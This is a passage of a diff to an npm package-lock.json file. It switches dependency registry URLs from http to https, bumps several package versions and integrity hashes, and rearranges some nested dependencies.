"https://registry.npmjs.org/qs/-/qs-2.4.2.tgz", "integrity": "sha1-9854jld33wtQENp/fE5zujJHD1o=" }, "type-is": { @@ -1495,7 +1473,7 @@ }, "express-fileupload": { "version": "0.0.5", - "resolved": "http://registry.npmjs.org/express-fileupload/-/express-fileupload-0.0.5.tgz", + "resolved": "https://registry.npmjs.org/express-fileupload/-/express-fileupload-0.0.5.tgz", "integrity": "sha1-QzpxJSWvqYtMkxYlIui/ecaNguc=", "requires": { "connect-busboy": "0.0.2", @@ -1525,7 +1503,7 @@ }, "finalhandler": { "version": "0.3.6", - "resolved": "http://registry.npmjs.org/finalhandler/-/finalhandler-0.3.6.tgz", + "resolved": "https://registry.npmjs.org/finalhandler/-/finalhandler-0.3.6.tgz", "integrity": "sha1-2vnEFhsbBuABRmsUEd/baXO+E4s=", "requires": { "debug": "~2.2.0", @@ -1533,11 +1511,24 @@ "on-finished": "~2.2.1" }, "dependencies": { + "debug": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.2.0.tgz", + "integrity": "sha1-+HBX6ZWxofauaklgZkE3vFbwOdo=", + "requires": { + "ms": "0.7.1" + } + }, "ee-first": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/ee-first/-/ee-first-1.1.0.tgz", "integrity": "sha1-ag18YiHkkP7v2S7D9EHJzozQl/Q=" }, + "ms": { + "version": "0.7.1", + "resolved": "https://registry.npmjs.org/ms/-/ms-0.7.1.tgz", + "integrity": "sha1-nNE8A62/8ltl7/3nzoZO6VIBcJg=" + }, "on-finished": { "version": "2.2.1", "resolved": "https://registry.npmjs.org/on-finished/-/on-finished-2.2.1.tgz", @@ -1550,7 +1541,7 @@ }, "foreground-child": { "version": "1.5.6", - "resolved": "http://registry.npmjs.org/foreground-child/-/foreground-child-1.5.6.tgz", + "resolved": "https://registry.npmjs.org/foreground-child/-/foreground-child-1.5.6.tgz", "integrity": "sha1-T9ca0t/elnibmApcCilZN8svXOk=", "requires": { "cross-spawn": "^4", @@ -1571,7 +1562,7 @@ }, "form-data": { "version": "0.1.4", - "resolved": "http://registry.npmjs.org/form-data/-/form-data-0.1.4.tgz", + "resolved": "https://registry.npmjs.org/form-data/-/form-data-0.1.4.tgz", "integrity": "sha1-kavXiKupcCsaq/qLwBAxoqyeOxI=", "optional": true, "requires": { @@ -1582,7 +1573,7 @@ "dependencies": { "mime": { "version": "1.2.11", - "resolved": "http://registry.npmjs.org/mime/-/mime-1.2.11.tgz", + "resolved": "https://registry.npmjs.org/mime/-/mime-1.2.11.tgz", "integrity": "sha1-WCA+7Ybjpe8XrtK32evUfwpg3RA=", "optional": true } @@ -1600,7 +1591,7 @@ }, "fs-extra": { "version": "0.22.1", - "resolved": "http://registry.npmjs.org/fs-extra/-/fs-extra-0.22.1.tgz", + "resolved": "https://registry.npmjs.org/fs-extra/-/fs-extra-0.22.1.tgz", "integrity": "sha1-X9b4BJ3JdsoZ6yNV1lgXPKvM4FY=", "requires": { "graceful-fs": "^4.1.2", @@ -1676,7 +1667,7 @@ }, "har-validator": { "version": "2.0.6", - "resolved": "http://registry.npmjs.org/har-validator/-/har-validator-2.0.6.tgz", + "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-2.0.6.tgz", "integrity": "sha1-zcvAgYgmWtEZtqWnyKtw7s+10n0=", "requires": { "chalk": "^1.1.1", @@ -1724,7 +1715,7 @@ }, "hawk": { "version": "1.1.1", - "resolved": "http://registry.npmjs.org/hawk/-/hawk-1.1.1.tgz", + "resolved": "https://registry.npmjs.org/hawk/-/hawk-1.1.1.tgz", "integrity": "sha1-h81JH5tG5OKurKM1QWdmiF0tHtk=", "optional": true, "requires": { @@ -1747,8 +1738,9 @@ }, "hoek": { "version": "0.9.1", - "resolved": "http://registry.npmjs.org/hoek/-/hoek-0.9.1.tgz", - "integrity": "sha1-PTIkYrrfB3Fup+uFuviAec3c5QU=" + "resolved": "https://registry.npmjs.org/hoek/-/hoek-0.9.1.tgz", + "integrity": "sha1-PTIkYrrfB3Fup+uFuviAec3c5QU=", + "optional": true }, "hooks-fixed": { "version": "1.1.0", @@ -1757,7 +1749,7 @@ }, "htmlescape": { "version": "1.1.1", - "resolved": "http://registry.npmjs.org/htmlescape/-/htmlescape-1.1.1.tgz", + "resolved": "https://registry.npmjs.org/htmlescape/-/htmlescape-1.1.1.tgz", "integrity": "sha1-OgPtwiFLyjtmQko+eVk0lQnLA1E=", "dev": true }, @@ -1788,20 +1780,23 @@ "dependencies": { "ms": { "version": "0.6.2", - "resolved": "http://registry.npmjs.org/ms/-/ms-0.6.2.tgz", + "resolved": "https://registry.npmjs.org/ms/-/ms-0.6.2.tgz", "integrity": "sha1-2JwhJMb9wTU9Zai3e/GqxLGTcIw=" } } }, "iconv-lite": { - "version": "0.4.4", - "resolved": "http://registry.npmjs.org/iconv-lite/-/iconv-lite-0.4.4.tgz", - "integrity": "sha1-6V8uQdsHNfwhZS94J6XuMuY8g6g=" + "version": "0.4.24", + "resolved": "https://registry.npmjs.org/iconv-lite/-/iconv-lite-0.4.24.tgz", + "integrity": "sha512-v3MXnZAcvnywkTUEZomIActle7RXXeedOR31wwl7VlyoXO4Qi9arvSenNQWne1TcRwhCL1HwLI21bEqdpj8/rA==", + "requires": { + "safer-buffer": ">= 2.1.2 < 3" + } }, "ieee754": { - "version": "1.1.12", - "resolved": "https://registry.npmjs.org/ieee754/-/ieee754-1.1.12.tgz", - "integrity": "sha512-GguP+DRY+pJ3soyIiGPTvdiVXjZ+DbXOxGpXn3eMvNW4x4irjqXm4wHKscC+TfxSJ0yw/S1F24tqdMNsMZTiLA==", + "version": "1.1.13", + "resolved": "https://registry.npmjs.org/ieee754/-/ieee754-1.1.13.tgz", + "integrity": "sha512-4vf7I2LYV/HaWerSo3XmlMkp5eZ83i+/CDluXi/IGTs/O1sejBNhTtnxzmRZfvOUqj7lZjqHkeTvpgSFDlWZTg==", "dev": true }, "indexof": { @@ -1876,7 +1871,7 @@ }, "readable-stream": { "version": "2.3.6", - "resolved": "http://registry.npmjs.org/readable-stream/-/readable-stream-2.3.6.tgz", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.6.tgz", "integrity": "sha512-tQtKA9WIAhBF3+VLAseyMqZeBjW0AHJoxOtYqSUZNJxauErmLbVm2FW1y+J/YA9dUrAC39ITejlZWhVIwawkKw==", "dev": true, "requires": { @@ -1891,7 +1886,7 @@ }, "string_decoder": { "version": "1.1.1", - "resolved": "http://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "dev": true, "requires": { @@ -1900,6 +1895,12 @@ } } }, + "ip-regex": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/ip-regex/-/ip-regex-2.1.0.tgz", + "integrity": "sha1-+ni/XS5pE8kRzp+BnuUUa7bYROk=", + "optional": true + }, "ipaddr.js": { "version": "1.0.5", "resolved": "https://registry.npmjs.org/ipaddr.js/-/ipaddr.js-1.0.5.tgz", @@ -1959,9 +1960,9 @@ "integrity": "sha1-LInWiJterFIqfuoywUUhVZxsvwI=" }, "js-yaml": { - "version": "3.11.0", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.11.0.tgz", - "integrity": "sha512-saJstZWv7oNeOyBh3+Dx1qWzhW0+e6/8eDzo7p5rDFqxntSztloLtuKu+Ejhtq82jsilwOIZYsCz+lIjthg1Hw==", + "version": "3.13.1", + "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.13.1.tgz", + "integrity": "sha512-YfbcO7jXDdyj0DGxYVSlSeQNHbD7XPWvrVWeVUujrQEoZzWJIRrCPoyk6kL6IAjAG2IolMK4T0hNUe0HOUs5Jw==", "requires": { "argparse": "^1.0.7", "esprima": "^4.0.0" @@ -1993,7 +1994,7 @@ }, "jsonfile": { "version": "2.4.0", - "resolved": "http://registry.npmjs.org/jsonfile/-/jsonfile-2.4.0.tgz", + "resolved": "https://registry.npmjs.org/jsonfile/-/jsonfile-2.4.0.tgz", "integrity": "sha1-NzaitCi4e72gzIO1P6PWM6NcKug=", "requires": { "graceful-fs": "^4.1.6" @@ -2035,7 +2036,7 @@ }, "kareem": { "version": "1.0.1", - "resolved": "http://registry.npmjs.org/kareem/-/kareem-1.0.1.tgz", + "resolved": "https://registry.npmjs.org/kareem/-/kareem-1.0.1.tgz", "integrity": "sha1-eAXSFbtTIU7Dr5aaHQsfF+PnuVw=" }, "kerberos": { @@ -2049,7 +2050,7 @@ }, "labeled-stream-splicer": { "version": "2.0.1", - "resolved": "http://registry.npmjs.org/labeled-stream-splicer/-/labeled-stream-splicer-2.0.1.tgz", + "resolved": "https://registry.npmjs.org/labeled-stream-splicer/-/labeled-stream-splicer-2.0.1.tgz", "integrity": "sha512-MC94mHZRvJ3LfykJlTUipBqenZz1pacOZEMhhQ8dMGcDHs0SBE5GbsavUXV7YtP3icBW17W0Zy1I0lfASmo9Pg==", "dev": true, "requires": { @@ -2071,6 +2072,11 @@ "resolved": "https://registry.npmjs.org/lcov-parse/-/lcov-parse-0.0.10.tgz", "integrity": "sha1-GwuP+ayceIklBYK3C3ExXZ2m2aM=" }, + "lodash": { + "version": "4.17.4", + "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.4.tgz", + "integrity": "sha1-eCA6TRwyiuHYbcpkYONptX9AVa4=" + }, "lodash.memoize": { "version": "3.0.4", "resolved": "https://registry.npmjs.org/lodash.memoize/-/lodash.memoize-3.0.4.tgz", @@ -2084,12 +2090,12 @@ }, "lru-cache": { "version": "2.3.1", - "resolved": "http://registry.npmjs.org/lru-cache/-/lru-cache-2.3.1.tgz", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-2.3.1.tgz", "integrity": "sha1-s632s9hW6VTiw5DmzvIggSRaU9Y=" }, "marked": { "version": "0.3.5", - "resolved": "http://registry.npmjs.org/marked/-/marked-0.3.5.tgz", + "resolved": "https://registry.npmjs.org/marked/-/marked-0.3.5.tgz", "integrity": "sha1-QROhWsXXvKFYpargciRYe5+hW5Q=" }, "md5.js": { @@ -2105,7 +2111,7 @@ }, "media-typer": { "version": "0.3.0", - "resolved": "http://registry.npmjs.org/media-typer/-/media-typer-0.3.0.tgz", + "resolved": "https://registry.npmjs.org/media-typer/-/media-typer-0.3.0.tgz", "integrity": "sha1-hxDXrwqmJvj/+hzgAWhUUmMlV0g=" }, "merge-descriptors": { @@ -2161,17 +2167,17 @@ }, "mime": { "version": "1.3.4", - "resolved": "http://registry.npmjs.org/mime/-/mime-1.3.4.tgz", + "resolved": "https://registry.npmjs.org/mime/-/mime-1.3.4.tgz", "integrity": "sha1-EV+eO2s9rylZmDyzjxSaLUDrXVM=" }, "mime-db": { "version": "1.12.0", - "resolved": "http://registry.npmjs.org/mime-db/-/mime-db-1.12.0.tgz", + "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.12.0.tgz", "integrity": "sha1-PQxjGA9FjrENMlqqN9fFiuMS6dc=" }, "mime-types": { "version": "2.0.14", - "resolved": "http://registry.npmjs.org/mime-types/-/mime-types-2.0.14.tgz", + "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.0.14.tgz", "integrity": "sha1-MQ4VnbI+B3+Lsit0jav6SVcUCqY=", "requires": { "mime-db": "~1.12.0" @@ -2199,12 +2205,12 @@ }, "minimist": { "version": "1.2.0", - "resolved": "http://registry.npmjs.org/minimist/-/minimist-1.2.0.tgz", + "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.0.tgz", "integrity": "sha1-o1AIsg9BOD7sH7kU9M1d95omQoQ=" }, "mkdirp": { "version": "0.3.5", - "resolved": "http://registry.npmjs.org/mkdirp/-/mkdirp-0.3.5.tgz", + "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.3.5.tgz", "integrity": "sha1-3j5fiWHIjHh+4TaN+EmsRBPsqNc=" }, "module-deps": { @@ -2244,7 +2250,7 @@ }, "readable-stream": { "version": "2.3.6", - "resolved": "http://registry.npmjs.org/readable-stream/-/readable-stream-2.3.6.tgz", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.6.tgz", "integrity": "sha512-tQtKA9WIAhBF3+VLAseyMqZeBjW0AHJoxOtYqSUZNJxauErmLbVm2FW1y+J/YA9dUrAC39ITejlZWhVIwawkKw==", "dev": true, "requires": { @@ -2259,7 +2265,7 @@ }, "string_decoder": { "version": "1.1.1", - "resolved": "http://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "dev": true, "requires": { @@ -2270,35 +2276,22 @@ }, "moment": { "version": "2.15.1", - "resolved": "http://registry.npmjs.org/moment/-/moment-2.15.1.tgz", + "resolved": "https://registry.npmjs.org/moment/-/moment-2.15.1.tgz", "integrity": "sha1-6XnCop4iiI5g85byIgphGPhc2Uw=" }, "mongodb": { "version": "2.0.46", - "resolved": "http://registry.npmjs.org/mongodb/-/mongodb-2.0.46.tgz", + "resolved": "https://registry.npmjs.org/mongodb/-/mongodb-2.0.46.tgz", "integrity": "sha1-sbhXRl5F4lmx4OAzaYNBpky5NVk=", "requires": { "es6-promise": "2.1.1", "mongodb-core": "1.2.19", "readable-stream": "1.0.31" - }, - "dependencies": { - "readable-stream": { - "version": "1.0.31", - "resolved": "http://registry.npmjs.org/readable-stream/-/readable-stream-1.0.31.tgz", - "integrity": "sha1-jyUC4LyeOw2huUUgqrtOJgPsr64=", - "requires": { - "core-util-is": "~1.0.0", - "inherits": "~2.0.1", - "isarray": "0.0.1", - "string_decoder": "~0.10.x" - } - } } }, "mongodb-core": { "version": "1.2.19", - "resolved": "http://registry.npmjs.org/mongodb-core/-/mongodb-core-1.2.19.tgz", + "resolved": "https://registry.npmjs.org/mongodb-core/-/mongodb-core-1.2.19.tgz", "integrity": "sha1-/LNfa2q8XD3h8aSl21JrnjBvPrc=", "requires": { "bson": "~0.4.19", @@ -2307,7 +2300,7 @@ }, "mongoose": { "version": "4.2.4", - "resolved": "http://registry.npmjs.org/mongoose/-/mongoose-4.2.4.tgz", + "resolved": "https://registry.npmjs.org/mongoose/-/mongoose-4.2.4.tgz", "integrity": "sha1-4vjAB92Dj2YztPbJZbqSojKskxc=", "requires": { "async": "0.9.0", @@ -2326,7 +2319,7 @@ "dependencies": { "ms": { "version": "0.7.1", - "resolved": "http://registry.npmjs.org/ms/-/ms-0.7.1.tgz", + "resolved": "https://registry.npmjs.org/ms/-/ms-0.7.1.tgz", "integrity": "sha1-nNE8A62/8ltl7/3nzoZO6VIBcJg=" } } @@ -2378,7 +2371,7 @@ }, "mpath": { "version": "0.1.1", - "resolved": "http://registry.npmjs.org/mpath/-/mpath-0.1.1.tgz", + "resolved": "https://registry.npmjs.org/mpath/-/mpath-0.1.1.tgz", "integrity": "sha1-I9qFK3wjLuCX9HWdKcDunNItXkY=" }, "mpromise": { @@ -2399,8 +2392,21 @@ "dependencies": { "bluebird": { "version": "2.9.26", - "resolved": "http://registry.npmjs.org/bluebird/-/bluebird-2.9.26.tgz", + "resolved": "https://registry.npmjs.org/bluebird/-/bluebird-2.9.26.tgz", "integrity": "sha1-Nidy6k0J9VakufO2TC/RNuh+OlU=" + }, + "debug": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.2.0.tgz", + "integrity": "sha1-+HBX6ZWxofauaklgZkE3vFbwOdo=", + "requires": { + "ms": "0.7.1" + } + }, + "ms": { + "version": "0.7.1", + "resolved": "https://registry.npmjs.org/ms/-/ms-0.7.1.tgz", + "integrity": "sha1-nNE8A62/8ltl7/3nzoZO6VIBcJg=" } } }, @@ -2416,16 +2422,16 @@ }, "nan": { "version": "2.10.0", - "resolved": "http://registry.npmjs.org/nan/-/nan-2.10.0.tgz", + "resolved": "https://registry.npmjs.org/nan/-/nan-2.10.0.tgz", "integrity": "sha512-bAdJv7fBLhWC+/Bls0Oza+mvTaNQtP+1RyhhhvD95pgUJz6XM5IzgmxOkItJ9tkoCiplvAnXI1tNmmUD/eScyA==", "optional": true }, "needle": { - "version": "2.2.4", - "resolved": "https://registry.npmjs.org/needle/-/needle-2.2.4.tgz", - "integrity": "sha512-HyoqEb4wr/rsoaIDfTH2aVL9nWtQqba2/HvMv+++m8u0dz808MaagKILxtfeSN7QU7nvbQ79zk3vYOJp9zsNEA==", + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/needle/-/needle-2.3.0.tgz", + "integrity": "sha512-QBZu7aAFR0522EyaXZM0FZ9GLpq6lvQ3uq8gteiDUp7wKdy0lSd2hPlgFwVuW1CBkfEs9PfDQsQzZghLs/psdg==", "requires": { - "debug": "^2.1.2", + "debug": "^4.1.0", "iconv-lite": "^0.4.4", "sax": "^1.2.4" } @@ -2435,11 +2441,6 @@ "resolved": "https://registry.npmjs.org/negotiator/-/negotiator-0.4.9.tgz", "integrity": "sha1-kuRrbbU8fkIe1koryU8IvnYw3z8=" }, - "node-uuid": { - "version": "1.4.8", - "resolved": "https://registry.npmjs.org/node-uuid/-/node-uuid-1.4.8.tgz", - "integrity": "sha1-sEDrCSOWivq/jTL7HxfxFn/auQc=" - }, "nopt": { "version": "2.2.1", "resolved": "https://registry.npmjs.org/nopt/-/nopt-2.2.1.tgz", @@ -2472,12 +2473,17 @@ "version": "1.1.1", "resolved": "https://registry.npmjs.org/once/-/once-1.1.1.tgz", "integrity": "sha1-nbV0kzzLCMOnYU0VQDLAnqbzOec=" + }, + "semver": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/semver/-/semver-1.1.4.tgz", + "integrity": "sha1-LlpOcrqwNHLMl/cnU7RQiRLvVUA=" } } }, "nyc": { "version": "6.6.1", - "resolved": "http://registry.npmjs.org/nyc/-/nyc-6.6.1.tgz", + "resolved": "https://registry.npmjs.org/nyc/-/nyc-6.6.1.tgz", "integrity": "sha1-L2AUYQpXBwAhxMBn6bnjMKI6xqc=", "requires": { "append-transform": "^0.4.0", @@ -4277,9 +4283,9 @@ } }, "on-headers": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/on-headers/-/on-headers-1.0.1.tgz", - "integrity": "sha1-ko9dD0cNSTQmUepnlLCFfBAGk/c=" + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/on-headers/-/on-headers-1.0.2.tgz", + "integrity": "sha512-pZAE+FJLoyITytdqK0U5s+FIpjN0JP3OzFi/u8Rx+EV5/W+JTWGXG8xFzevE7AjBfDqHv/8vL8qQsIhHnqRkrA==" }, "once": { "version": "1.4.0", @@ -4317,7 +4323,7 @@ }, "pako": { "version": "0.2.9", - "resolved": "http://registry.npmjs.org/pako/-/pako-0.2.9.tgz", + "resolved": "https://registry.npmjs.org/pako/-/pako-0.2.9.tgz", "integrity": "sha1-8/dSL073gjSNqBYbrZ7P1Rv4OnU=", "dev": true }, @@ -4331,22 +4337,23 @@ } }, "parse-asn1": { - "version": "5.1.1", - "resolved": "http://registry.npmjs.org/parse-asn1/-/parse-asn1-5.1.1.tgz", - "integrity": "sha512-KPx7flKXg775zZpnp9SxJlz00gTd4BmJ2yJufSc44gMCRrRQ7NSzAcSJQfifuOLgW6bEi+ftrALtsgALeB2Adw==", + "version": "5.1.4", + "resolved": "https://registry.npmjs.org/parse-asn1/-/parse-asn1-5.1.4.tgz", + "integrity": "sha512-Qs5duJcuvNExRfFZ99HDD3z4mAi3r9Wl/FOjEOijlxwCZs7E7mW2vjTpgQ4J8LpTF8x5v+1Vn5UQFejmWT11aw==", "dev": true, "requires": { "asn1.js": "^4.0.0", "browserify-aes": "^1.0.0", "create-hash": "^1.1.0", "evp_bytestokey": "^1.0.0", - "pbkdf2": "^3.0.3" + "pbkdf2": "^3.0.3", + "safe-buffer": "^5.1.1" } }, "parseurl": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/parseurl/-/parseurl-1.3.2.tgz", - "integrity": "sha1-/CidTtiZMRlGDBViUyYs3I3mW/M=" + "version": "1.3.3", + "resolved": "https://registry.npmjs.org/parseurl/-/parseurl-1.3.3.tgz", + "integrity": "sha512-CiyeOxFT/JZyN5m0z9PfXw4SCBJ6Sygz1Dpl0wqjlhDEGGBP1GnsUVEL0p63hoG1fcj3fHynXi9NYO4nWOL+qQ==" }, "path-browserify": { "version": "0.0.1", @@ -4356,7 +4363,7 @@ }, "path-is-absolute": { "version": "1.0.1", - "resolved": "http://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", + "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", "integrity": "sha1-F0uSaHNVNP+8es5r9TpanhtcX18=" }, "path-parse": { @@ -4465,7 +4472,7 @@ }, "qs": { "version": "2.2.4", - "resolved": "http://registry.npmjs.org/qs/-/qs-2.2.4.tgz", + "resolved": "https://registry.npmjs.org/qs/-/qs-2.2.4.tgz", "integrity": "sha1-Lp+800tUDjQhySTs0B6QqpdTGcg=" }, "querystring": { @@ -4481,9 +4488,9 @@ "dev": true }, "randombytes": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/randombytes/-/randombytes-2.0.6.tgz", - "integrity": "sha512-CIQ5OFxf4Jou6uOKe9t1AOgqpeU5fd70A8NPdHSGeYXqXsPe6peOwI0cUl88RWZ6sP1vPMV3avd/R6cZ5/sP1A==", + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/randombytes/-/randombytes-2.1.0.tgz", + "integrity": "sha512-vYl3iOX+4CKUWuxGi9Ukhie6fsqXqS9FE2Zaic4tNFD2N2QQaXOMFbuKK4QmDHC0JO6B1Zp41J0LpT0oR68amQ==", "dev": true, "requires": { "safe-buffer": "^5.1.0" @@ -4511,6 +4518,13 @@ "requires": { "bytes": "1", "iconv-lite": "0.4.4" + }, + "dependencies": { + "iconv-lite": { + "version": "0.4.4", + "resolved": "https://registry.npmjs.org/iconv-lite/-/iconv-lite-0.4.4.tgz", + "integrity": "sha1-6V8uQdsHNfwhZS94J6XuMuY8g6g=" + } } }, "read-only-stream": { @@ -4530,7 +4544,7 @@ }, "readable-stream": { "version": "2.3.6", - "resolved": "http://registry.npmjs.org/readable-stream/-/readable-stream-2.3.6.tgz", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.6.tgz", "integrity": "sha512-tQtKA9WIAhBF3+VLAseyMqZeBjW0AHJoxOtYqSUZNJxauErmLbVm2FW1y+J/YA9dUrAC39ITejlZWhVIwawkKw==", "dev": true, "requires": { @@ -4545,7 +4559,7 @@ }, "string_decoder": { "version": "1.1.1", - "resolved": "http://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "dev": true, "requires": { @@ -4555,9 +4569,9 @@ } }, "readable-stream": { - "version": "1.1.14", - "resolved": "http://registry.npmjs.org/readable-stream/-/readable-stream-1.1.14.tgz", - "integrity": "sha1-fPTFTvZI44EwhMY23SB54WbAgdk=", + "version": "1.0.31", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-1.0.31.tgz", + "integrity": "sha1-jyUC4LyeOw2huUUgqrtOJgPsr64=", "requires": { "core-util-is": "~1.0.0", "inherits": "~2.0.1", @@ -4572,7 +4586,7 @@ }, "request": { "version": "2.42.0", - "resolved": "http://registry.npmjs.org/request/-/request-2.42.0.tgz", + "resolved": "https://registry.npmjs.org/request/-/request-2.42.0.tgz", "integrity": "sha1-VyvQFIk4VkBArHqxSLlkI6BjMEo=", "requires": { "aws-sign2": "~0.5.0", @@ -4594,23 +4608,28 @@ "dependencies": { "mime-types": { "version": "1.0.2", - "resolved": "http://registry.npmjs.org/mime-types/-/mime-types-1.0.2.tgz", + "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-1.0.2.tgz", "integrity": "sha1-mVrhOSq4r/y/yyZB3QVOlDwNXc4=" }, + "node-uuid": { + "version": "1.4.8", + "resolved": "https://registry.npmjs.org/node-uuid/-/node-uuid-1.4.8.tgz", + "integrity": "sha1-sEDrCSOWivq/jTL7HxfxFn/auQc=" + }, "qs": { "version": "1.2.2", - "resolved": "http://registry.npmjs.org/qs/-/qs-1.2.2.tgz", + "resolved": "https://registry.npmjs.org/qs/-/qs-1.2.2.tgz", "integrity": "sha1-GbV/8k3CqZzh+L32r82ln472H4g=" } } }, "resolve": { - "version": "1.8.1", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.8.1.tgz", - "integrity": "sha512-AicPrAC7Qu1JxPCZ9ZgCZlY35QgFnNqc+0LtbRNxnVw4TXvjQ72wnuL9JQcEBgXkI9JM8MsT9kaQoHcpCRJOYA==", + "version": "1.10.0", + "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.10.0.tgz", + "integrity": "sha512-3sUr9aq5OfSg2S9pNtPA9hL1FVEAjvfOC4leW0SNf/mpnaakz2a9femSd6LqAww2RaFctwyf1lCqnTHuF1rxDg==", "dev": true, "requires": { - "path-parse": "^1.0.5" + "path-parse": "^1.0.6" } }, "resumer": { @@ -4622,11 +4641,11 @@ } }, "rimraf": { - "version": "2.6.2", - "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.6.2.tgz", - "integrity": "sha512-lreewLK/BlghmxtfH36YYVg1i8IAce4TI7oao75I1g245+6BctqTVQiBP3YUJ9C6DQOXJmkYR9X9fCLtCOJc5w==", + "version": "2.6.3", + "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.6.3.tgz", + "integrity": "sha512-mwqeW5XsA2qAejG46gYdENaxXjx9onRNCfn7L0duuP4hCuTIi/QO7PDK07KJfp1d+izWPrzEJDcSqBa0OZQriA==", "requires": { - "glob": "^7.0.5" + "glob": "^7.1.3" } }, "ripemd160": { @@ -4655,9 +4674,9 @@ "integrity": "sha512-NqVDv9TpANUjFm0N8uM5GxL36UgKi9/atZw+x7YFnQ8ckwFGKrl4xX4yWtrey3UJm5nP1kUbnYgLopqWNSRhWw==" }, "semver": { - "version": "1.1.4", - "resolved": "http://registry.npmjs.org/semver/-/semver-1.1.4.tgz", - "integrity": "sha1-LlpOcrqwNHLMl/cnU7RQiRLvVUA=" + "version": "5.7.0", + "resolved": "https://registry.npmjs.org/semver/-/semver-5.7.0.tgz", + "integrity": "sha512-Ya52jSX2u7QKghxeoFGpLwCtGlt7j0oY9DYb5apt9nPlJ42ID+ulTXESnt/qAQcoSERyZ5sl3LDIOw0nAn/5DA==" }, "send": { "version": "0.12.3", @@ -4676,6 +4695,14 @@ "range-parser": "~1.0.2" }, "dependencies": { + "debug": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.2.0.tgz", + "integrity": "sha1-+HBX6ZWxofauaklgZkE3vFbwOdo=", + "requires": { + "ms": "0.7.1" + } + }, "ee-first": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/ee-first/-/ee-first-1.1.0.tgz", @@ -4683,7 +4710,7 @@ }, "ms": { "version": "0.7.1", - "resolved": "http://registry.npmjs.org/ms/-/ms-0.7.1.tgz", + "resolved": "https://registry.npmjs.org/ms/-/ms-0.7.1.tgz", "integrity": "sha1-nNE8A62/8ltl7/3nzoZO6VIBcJg=" }, "on-finished": { @@ -4709,7 +4736,7 @@ }, "sha.js": { "version": "2.4.11", - "resolved": "http://registry.npmjs.org/sha.js/-/sha.js-2.4.11.tgz", + "resolved": "https://registry.npmjs.org/sha.js/-/sha.js-2.4.11.tgz", "integrity": "sha512-QMEp5B7cftE7APOjk5Y6xgrbWu+WkLVQwk8JNjZ8nKRciZaByEW6MubieAiToS7+dwvrjGhH8jRXz3MVd0AYqQ==", "dev": true, "requires": { @@ -4719,7 +4746,7 @@ }, "shasum": { "version": "1.0.2", - "resolved": "http://registry.npmjs.org/shasum/-/shasum-1.0.2.tgz", + "resolved": "https://registry.npmjs.org/shasum/-/shasum-1.0.2.tgz", "integrity": "sha1-5wEjENj0F/TetXEhUOVni4euVl8=", "dev": true, "requires": { @@ -4757,7 +4784,7 @@ }, "sntp": { "version": "0.2.4", - "resolved": "http://registry.npmjs.org/sntp/-/sntp-0.2.4.tgz", + "resolved": "https://registry.npmjs.org/sntp/-/sntp-0.2.4.tgz", "integrity": "sha1-+4hfGLDzqtGJ+CSGJTa87ux1CQA=", "optional": true, "requires": { @@ -4772,7 +4799,7 @@ }, "split": { "version": "0.2.10", - "resolved": "http://registry.npmjs.org/split/-/split-0.2.10.tgz", + "resolved": "https://registry.npmjs.org/split/-/split-0.2.10.tgz", "integrity": "sha1-Zwl8YB1pfOE2j0GPBs0gHPBSGlc=", "requires": { "through": "2" @@ -4780,13 +4807,13 @@ }, "sprintf-js": { "version": "1.0.3", - "resolved": "http://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", + "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", "integrity": "sha1-BOaSb2YolTVPPdAVIDYzuFcpfiw=" }, "sshpk": { - "version": "1.15.2", - "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.15.2.tgz", - "integrity": 